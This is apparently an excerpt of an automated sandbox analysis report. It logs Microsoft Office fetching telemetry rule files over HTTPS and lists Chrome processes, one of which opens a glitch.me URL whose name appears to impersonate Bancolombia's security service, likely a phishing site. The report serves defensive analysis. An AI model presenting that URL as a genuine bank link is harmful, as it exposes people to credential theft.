                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1360
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                          ETag: "0x8DC582BEDC8193E"
                                                                                                                          x-ms-request-id: b05a7aca-501e-0047-5422-1cce6c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cfvtw4hh2496wp8p800000003kg000000007sth
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          148192.168.2.44991313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:54 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:54 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:54 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1406
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                          ETag: "0x8DC582BEB16F27E"
                                                                                                                          x-ms-request-id: 17ba822c-f01e-001f-0875-1a5dc8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162154Z-17db6f7c8cfqkqk8bn4ck6f72000000004v000000000c1m6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:54 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          149192.168.2.44991413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:55 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:55 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:55 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1369
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                          ETag: "0x8DC582BE32FE1A2"
                                                                                                                          x-ms-request-id: cb98536f-301e-003f-4895-1b266f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162155Z-17db6f7c8cf6qp7g7r97wxgbqc00000004k0000000001f19
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:55 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:12:20:33
                                                                                                                          Start date:13/10/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:2
                                                                                                                          Start time:12:20:36
                                                                                                                          Start date:13/10/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,8027215415821508008,16941947998853397495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:12:20:38
                                                                                                                          Start date:13/10/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bancolombia-seguridad-co.glitch.me/"
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          No disassembly